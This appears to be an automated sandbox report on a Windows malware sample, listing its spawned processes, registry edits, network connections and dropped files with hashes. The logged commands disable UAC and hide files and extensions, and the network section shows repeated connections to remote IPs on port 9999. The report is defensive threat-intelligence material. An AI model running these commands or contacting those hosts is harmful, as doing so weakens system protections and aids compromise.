reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GGkUEowM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AGkgkosU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zWkkAUEc.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XcQcQUoo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JcoEgcQg.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FewQcMcQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZgUwcMIw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv la2qyzT3okuaHQyQ+cgrQA.0.2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gCkkcskY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hOoIAMcI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AKEskEcA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pEEEAMME.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

Network

Country Destination Domain Proto
BO 200.87.164.69:9999 tcp
US 8.8.8.8:53 google.com udp
BO 200.87.164.69:9999 tcp
GB 172.217.16.238:80 google.com tcp
GB 172.217.16.238:80 google.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
BO 200.119.204.12:9999 tcp
BO 200.119.204.12:9999 tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 110.11.19.2.in-addr.arpa udp
BO 190.186.45.170:9999 tcp
BO 190.186.45.170:9999 tcp
US 8.8.8.8:53 226.108.222.173.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 174.117.168.52.in-addr.arpa udp

Files

memory/2008-0-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3392-5-0x0000000000400000-0x000000000041D000-memory.dmp

C:\Users\Admin\mSgYkYQw\lWwscwwc.exe

MD5 170696f6d60b6c2b4aa857aaa68a7002
SHA1 c8832ba66a7ceedffde830aee29aac83404eb9bf
SHA256 090ff5e07cfbdbe0c5f58fd88e9dd4225efb29f7ef14fffabe8dc73706b9ed1b
SHA512 1bf4a449ea202ef972bc5147437bddd2e50b452436fb60634c64619f03f2846ae94194a179b5420f82ee4e863a4bad3165519af49cb5ce663664fb357adfb0a7

C:\ProgramData\RogQUwEA\IOcYUcsQ.exe

MD5 ce4649abb9a7ba9ef67dd5526f9e7c72
SHA1 bd8f91bfe17fd00456954ce00994c4e19238dae7
SHA256 8501237e21ed0a6361b32a09840af55faaf1858577405a7285f1b51f122c3ac4
SHA512 23a6c632e97b88fc519b7ea407c423395a4b10b88742f85bdc7f966fc48edaeaaebb767fae5e0ba8ea23f02fa0f1367f1e740afadd6a1161584282ec72a01732

memory/3964-15-0x0000000000400000-0x000000000041D000-memory.dmp

memory/2008-19-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

MD5 62eb5f8af13f0886f278614f5f43e21f
SHA1 7a0387dc6c5f9c31c18196fb860dd50a7a3e9c71
SHA256 ec3e84ad90487122ba0eba5945de8a2ca2b10ffc16b3a02746def24e926148b4
SHA512 7c5008c846420519589a99f04d6e5421f895c18cba00d3ae43cefadc594b185dfce5d21942cc67d0ab0e0666b6bab497e368ceeea87db8c35bcee8342d827c80

C:\Users\Admin\AppData\Local\Temp\cmAQsAAI.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

memory/228-29-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

memory/3024-41-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3928-52-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4396-63-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2208-74-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3668-85-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4768-86-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3668-97-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4796-108-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4588-119-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1020-130-0x0000000000400000-0x000000000041F000-memory.dmp

memory/5072-141-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1112-152-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3656-163-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4380-171-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2972-175-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2544-183-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4380-187-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2544-198-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1904-209-0x0000000000400000-0x000000000041F000-memory.dmp

memory/228-220-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1984-232-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4276-231-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4276-243-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3116-251-0x0000000000400000-0x000000000041F000-memory.dmp

memory/648-252-0x0000000000400000-0x000000000041F000-memory.dmp

memory/648-260-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2412-268-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1560-276-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4804-284-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4556-285-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4556-293-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2448-301-0x0000000000400000-0x000000000041F000-memory.dmp

memory/736-309-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1240-314-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4536-318-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1240-326-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4200-334-0x0000000000400000-0x000000000041F000-memory.dmp

memory/928-342-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3796-350-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4660-355-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2388-359-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4660-367-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3160-375-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4124-383-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3868-391-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4392-399-0x0000000000400000-0x000000000041F000-memory.dmp

memory/5112-407-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4356-415-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3052-423-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1424-431-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4384-439-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1844-447-0x0000000000400000-0x000000000041F000-memory.dmp

memory/652-455-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4300-463-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4396-471-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2060-479-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4500-487-0x0000000000400000-0x000000000041F000-memory.dmp

memory/244-492-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2712-496-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xUkA.exe

MD5 9c287847ded76e3ef7b350dc9b9296f5
SHA1 b10e6b44e86296444bf309bc132636976dd7b0bb
SHA256 83b09bbe1aa759b67746405ba883c783e4b9855fa41943ec27f2fed1585fad95
SHA512 468b8ed29ad6da8ad6c2d2b4688534c500e8dd68226e062ef7a82cb435f5190ab266fcbba4b36e7c2fb364b361fe23cfd2996a90f217856d6b85a2af4417a321

memory/244-519-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mQkG.exe

MD5 a05b1bf4bd19cac0327f5e83575ab98b
SHA1 91ea05fe30707edf6649614ceba38eeda0a09908
SHA256 042c9694c71ac02d2dff5868507ec071c3a7f6b53d2e7bb802436dbb0a11c5fa
SHA512 19abc343fbb2be4555956ad72a558fc36264f45f0ab1adb2557ea898e08e9ff11de0bf2738ab1d346e8a820982ef063677f7b8b0707cdefb30a90ba17eaddbe2

C:\Users\Admin\AppData\Local\Temp\zMwe.exe

MD5 53723caa0b5bea3fa70dbb9eaa913eb5
SHA1 3b146c148d1a3e7ef33456f59d14419945f6394f
SHA256 98c5bbedf1705843b2325caf00affd2caba20b932ae01adf068dc7c575b8a43a
SHA512 f9349d7f97e66191d21c5a64e2e5a85512e144581af63c5f38a43176ec19496c6f68d5dbccc2fbb831dcf5e0ad6ebdfada23a3f39a62e4717cdf7ab0c226d93d

C:\Users\Admin\AppData\Local\Temp\tkEu.ico

MD5 ee421bd295eb1a0d8c54f8586ccb18fa
SHA1 bc06850f3112289fce374241f7e9aff0a70ecb2f
SHA256 57e72b9591e318a17feb74efa1262e9222814ad872437094734295700f669563
SHA512 dfd36dff3742f39858e4a3e781e756f6d8480caa33b715ad1a8293f6ef436cdc84c3d26428230cdac8651c1ee7947b0e5bb3ac1e32c0b7bbb2bfed81375b5897

C:\Users\Admin\AppData\Local\Temp\qEMq.exe

MD5 3a35f27d53e5d3de9c3794b158598855
SHA1 17ad3f44fc2b22067433cb56c46247449806fe0c
SHA256 4d460a4a0a9f74cc860b42f791599fdfb4aae0d15cf75fdef38282bc33428f58
SHA512 befc2e9b64a0238c8f86a4c19371d045951839cf1522c79491ad54478c649137a97a30f3f53b1817d387487efa51e0ba01aae1b4442618fd966e79c6c423e3d6

